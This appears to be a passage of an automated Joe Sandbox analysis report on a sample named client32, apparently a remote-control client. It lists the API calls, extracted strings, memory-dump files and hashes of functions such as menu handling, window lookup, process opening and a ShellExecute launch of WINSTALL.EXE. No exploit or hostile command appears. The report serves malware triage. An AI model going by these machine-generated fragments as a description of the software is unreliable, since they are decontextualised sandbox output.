                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE71BC70E00286EFEB15CF64C884F9DBBF9AB04314F0481D9E44A9B291D770E9C5CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 1101D5C4
                                                                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 1101D5F4
                                                                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 1101D618
                                                                                                                                                                                                    • GetBkColor.GDI32(?), ref: 1101D61E
                                                                                                                                                                                                    • GetTextColor.GDI32(?), ref: 1101D6A5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InflateRect$Color$Text
                                                                                                                                                                                                    • String ID: VUUU$VUUU
                                                                                                                                                                                                    • API String ID: 1214208285-3149182767
                                                                                                                                                                                                    • Opcode ID: ce653334c1269ec63752947323ce46a0191a89749b5b5a7eff72ef3103528f33
                                                                                                                                                                                                    • Instruction ID: 77e576ce41c6bbc1f275e9696d100ffe4c5213a4300096d6b7fb60596d00f56b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce653334c1269ec63752947323ce46a0191a89749b5b5a7eff72ef3103528f33
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0617075E0021A9BCB04CFA8C881AAEF7F5FF98324F148629E415E7385D634FA05CB94
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(wininet.dll,00002000,00000000,00000000), ref: 689B6ABD
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetQueryOptionA), ref: 689B6ACF
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 689B6AFC
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 689B6B52
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProcwsprintf
                                                                                                                                                                                                    • String ID: InternetQueryOptionA$http://%s/testpage.htm$wininet.dll
                                                                                                                                                                                                    • API String ID: 3145926599-227718810
                                                                                                                                                                                                    • Opcode ID: 98827519aa6d7344154ae3da86c8645c23b63a0342555d7aac86c5109b85405e
                                                                                                                                                                                                    • Instruction ID: e8637f83c55a57a5eaf5ddbe4481bfaf112274552a6f81bc592bdfa8d06c6f56
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98827519aa6d7344154ae3da86c8645c23b63a0342555d7aac86c5109b85405e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65412171D001299BDB65CF68CD81FEEB7B8AF94304F4081E9E91DA7240EB709A859F90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 110051CE
                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 11005204
                                                                                                                                                                                                    • CheckMenuItem.USER32(?,00000000,00000000), ref: 11005261
                                                                                                                                                                                                    • EnableMenuItem.USER32(?,00000000,00000000), ref: 11005277
                                                                                                                                                                                                    • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005298
                                                                                                                                                                                                    • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 110052C4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountEnable
                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                    • API String ID: 4290561058-4108050209
                                                                                                                                                                                                    • Opcode ID: 30e732c661686793a5b6a227507d1879ad683f9c8e26dd4348ab49c0c8fb9c12
                                                                                                                                                                                                    • Instruction ID: 151c37117e6a4efcf468b3f2afefe3ee8c103672a57a50470b6f5af14a9aa5dd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30e732c661686793a5b6a227507d1879ad683f9c8e26dd4348ab49c0c8fb9c12
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A031A370D0121ABBEB01DFA4D889BEEBBFCEF46358F008159F951E6240E7759A44CB51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • BuildLUT(p12to8), took %d ms, xrefs: 1108B20B
                                                                                                                                                                                                    • BuildDynamicPalette(%d*%d), took %d ms, xrefs: 1108B1CF
                                                                                                                                                                                                    • SampleData(%d*%d,%d), took %d ms, xrefs: 1108B18F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Timetime
                                                                                                                                                                                                    • String ID: BuildDynamicPalette(%d*%d), took %d ms$BuildLUT(p12to8), took %d ms$SampleData(%d*%d,%d), took %d ms
                                                                                                                                                                                                    • API String ID: 17336451-2628575008
                                                                                                                                                                                                    • Opcode ID: 992fa46bb3b47cefd940a57ada63a850b45b29b138b254c3f8a49154365181f5
                                                                                                                                                                                                    • Instruction ID: bb2eac5478b68b536a49f708560dc7754919b06093feb73e476f748ba0a9216f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 992fa46bb3b47cefd940a57ada63a850b45b29b138b254c3f8a49154365181f5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36314FB9D04119AFDB10EFA8DC84AEFBBB8EB88718F104195FD0597241D634AE50CBE1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(Kernel32.dll,BBC4A55B,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110310E2
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031120
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 1103112E
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031146
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031154
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Library$AddressCurrentErrorFreeLastLoadProcProcess
                                                                                                                                                                                                    • String ID: Kernel32.dll$ProcessIdToSessionId
                                                                                                                                                                                                    • API String ID: 1613046405-2825297712
                                                                                                                                                                                                    • Opcode ID: f4f0926271d226468653afaa46d6990833a17734d1eaad82ad6fde684afcfe5d
                                                                                                                                                                                                    • Instruction ID: dbcb6794e105daa586ddc3bbf804ff67aea9c2c21b85bbe8f4e4c15c2f8116d0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4f0926271d226468653afaa46d6990833a17734d1eaad82ad6fde684afcfe5d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9621A2B1D21269AFCB01DF99D884A9EFFB8FB49B15F10852BF521E3244D7B419018FA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1102741E
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,76596610,?), ref: 1113F937
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CloseHandle.KERNEL32(00000000), ref: 1113F95F
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11027448
                                                                                                                                                                                                    • ShellExecuteA.SHELL32(00000000,open,?,/EM,00000000,00000001), ref: 1102749B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$CreateFolderPathwsprintf$CloseExecuteHandleModuleNameShell
                                                                                                                                                                                                    • String ID: "%sWINST32.EXE"$"%sWINSTALL.EXE"$/EM$open
                                                                                                                                                                                                    • API String ID: 816263943-3387570681
                                                                                                                                                                                                    • Opcode ID: 474e4a5f26d8134d6f28c1743d0d9889b4922dd9f32edc34b04f7a1facad78e0
                                                                                                                                                                                                    • Instruction ID: 425802901d1907c5be7fd2b9c3bfd6c49e25210cb6f83e26e9bc69af70aaa39f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 474e4a5f26d8134d6f28c1743d0d9889b4922dd9f32edc34b04f7a1facad78e0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B411C875E0131EABDB11EBB5CC45FAAF7A89B04708F5041F5E91597181EB31B9048B91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindWindowA.USER32(?,00000000), ref: 1108B274
                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,04000000), ref: 1108B293
                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000440,00000000,04000000,110EAA59,?,04000000,00000000,?,00000000,00000000,?,00000000,110EA93D,?,110EAA59,0000070B), ref: 1108B2A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ProcessWindow$FindOpenThread
                                                                                                                                                                                                    • String ID: Error. NULL hToken$Progman
                                                                                                                                                                                                    • API String ID: 3432422346-976623215
                                                                                                                                                                                                    • Opcode ID: 059be4ecc652e061e66f05b14170a3aabe5fe35332d29859c985ce1771b9b1d6
                                                                                                                                                                                                    • Instruction ID: 4ee04209679d4ac62f627f7e7d6e091cb71ded9887b28b928329626620bf84cb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 059be4ecc652e061e66f05b14170a3aabe5fe35332d29859c985ce1771b9b1d6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25119675E0122D9BD751DFA4D885BEEF7B8EF4C218F1081A9EE16E7240DB31A900C7A5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadMenuA.USER32(00000000,00002EFF), ref: 110033BE
                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 110033EA
                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 1100340C
                                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 1100341A
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                                                    • API String ID: 468487828-934300333
                                                                                                                                                                                                    • Opcode ID: 4bbcc618e98ef98e9cc3961995019deef03965a6bc052ed1dd22c5c51f3fda12
                                                                                                                                                                                                    • Instruction ID: 24594387450efb2066981165f5525a36b814e5bc10ecad7e7e85ab1dcfd37f25
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bbcc618e98ef98e9cc3961995019deef03965a6bc052ed1dd22c5c51f3fda12
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71F0E93AF4066677D61352666CC5F4FE66C8B91AA8F110071F614BA684EE11A80051EA
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadMenuA.USER32(00000000,00002EF9), ref: 110032CD
                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 110032F3
                                                                                                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 11003317
                                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 11003329
